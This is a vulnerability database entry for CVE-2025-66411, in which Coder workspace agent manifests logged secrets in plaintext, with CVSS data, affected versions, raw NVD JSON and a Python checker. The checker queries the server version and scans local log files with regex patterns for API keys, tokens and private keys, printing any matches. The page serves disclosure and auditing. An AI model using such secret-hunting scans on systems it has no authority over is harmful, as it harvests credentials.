Security Vulnerability Report
CVE-2025-66411 CVSS 7.8 HIGH

CVE-2025-66411

Published: 2025-12-03 20:16:27
Last Modified: 2026-02-13 16:09:10

Description

Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:* - VULNERABLE: Coder < 2.26.5 (all versions in the 2.26.x series)
cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:* - VULNERABLE: Coder < 2.27.7 (all versions in the 2.27.x series)
cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:* - VULNERABLE: Coder < 2.28.4 (all versions in the 2.28.x series)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66411 PoC - Sensitive Information Log Disclosure
# This PoC demonstrates how to check for exposed sensitive information in Coder logs
import glob
import re

import requests


def check_coder_version(coder_url):
    """Check Coder server version (None if it cannot be determined)"""
    try:
        response = requests.get(f"{coder_url.rstrip('/')}/api/v2/version", timeout=10)
        if response.status_code == 200:
            return response.json().get('version', '')
    except (requests.RequestException, ValueError):
        # Network failure or a non-JSON body: version unknown
        return None
    return None


def check_vulnerable_versions(version):
    """Check if version is vulnerable (None if the version string cannot be parsed)"""
    if not version:
        return None
    # Parse version number; re.search tolerates a leading "v" and build metadata
    match = re.search(r'(\d+)\.(\d+)\.(\d+)', version)
    if not match:
        return None
    major, minor, patch = (int(g) for g in match.groups())
    # Affected ranges per the configuration above: < 2.26.5, 2.27.x < 2.27.7, 2.28.x < 2.28.4
    if major == 2:
        if minor < 26:
            return True
        if minor == 26 and patch < 5:
            return True
        if minor == 27 and patch < 7:
            return True
        if minor == 28 and patch < 4:
            return True
    return False


SENSITIVE_PATTERNS = [
    r'(?i)(api[_-]?key|token|secret|password|credential)["\']?\s*[:=]\s*["\'][^"\']+["\']',
    r'-----BEGIN (RSA |EC )?PRIVATE KEY-----',
    r'aws_access_key_id',
    r'ghp_[a-zA-Z0-9]{36}',
    r'gho_[a-zA-Z0-9]{36}',
    r'sk-[a-zA-Z0-9]{48}',
]


def search_logs_for_secrets(log_locations):
    """Search log files for sensitive information patterns"""
    # Scan in Python rather than shelling out to grep: POSIX ERE does not accept the
    # (?i) flag, and glob patterns such as /var/log/coder/*.log must be expanded here
    patterns = [re.compile(p) for p in SENSITIVE_PATTERNS]
    findings = []
    for location in log_locations:
        for log_path in glob.glob(location, recursive=True):
            try:
                with open(log_path, 'r', errors='replace') as fh:
                    matches = [line.rstrip('\n') for line in fh
                               if any(p.search(line) for p in patterns)]
            except OSError:
                # Unreadable file (permissions, rotated away): skip it
                continue
            if matches:
                findings.append({'log': log_path, 'matches': '\n'.join(matches)})
    return findings


def main():
    coder_url = input("Enter Coder server URL: ").strip()
    version = check_coder_version(coder_url)
    if not version:
        print("[-] Could not determine Coder version")
        return
    print(f"[+] Coder version: {version}")
    if check_vulnerable_versions(version):
        print("[!] This version is VULNERABLE to CVE-2025-66411")
        print("[+] Checking for sensitive information in logs...")
        log_locations = [
            '/var/log/coder/*.log',
            '/var/log/containers/*.log',
            '/var/log/pods/*/workspace-agent/*.log',
        ]
        findings = search_logs_for_secrets(log_locations)
        if findings:
            print(f"[CRITICAL] Found {len(findings)} potential exposures:")
            for finding in findings:
                print(f"\n{finding['log']}:")
                print(finding['matches'])
        else:
            print("[+] No obvious secrets found in checked locations")
    else:
        print("[+] Version is NOT vulnerable")


if __name__ == "__main__":
    main()
```

References

https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289 (Patch)
https://github.com/coder/coder/releases/tag/v2.26.5 (Product, Release Notes)
https://github.com/coder/coder/releases/tag/v2.27.7 (Product, Release Notes)
https://github.com/coder/coder/releases/tag/v2.28.4 (Product, Release Notes)
https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74 (Exploit, Patch, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66411",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T20:16:26.727",
    "lastModified": "2026-02-13T16:09:09.850",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4."},
      {"lang": "es", "value": "Coder permite a las organizaciones aprovisionar entornos de desarrollo remotos a través de Terraform. En versiones anteriores a 2.26.5, 2.27.7 y 2.28.4, los manifiestos del Agente de Espacio de Trabajo que contenían valores sensibles se registraban en texto plano sin depurar. Un atacante con acceso local limitado al Espacio de Trabajo de Coder (VM, Pod de K8s, etc.) o a un sistema de terceros (SIEM, pila de registro) podría acceder a esos registros. Esta vulnerabilidad está corregida en 2.26.5, 2.27.7 y 2.28.4."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"},
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:*", "versionEndExcluding": "2.26.5", "matchCriteriaId": "485831F1-651C-46F8-BEB4-91EC0DD8E284"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:*", "versionStartIncluding": "2.27.0", "versionEndExcluding": "2.27.7", "matchCriteriaId": "F2601993-8C91-426B-9A52-833FAA97D45C"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:*", "versionStartIncluding": "2.28.0", "versionEndExcluding": "2.28.4", "matchCriteriaId": "5C8EFC89-B911-4AC4-B805-017148C0C8FE"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/coder/coder/releases/tag/v2.26.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/coder/coder/releases/tag/v2.27.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/coder/coder/releases/tag/v2.28.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}
    ]
  }
}
```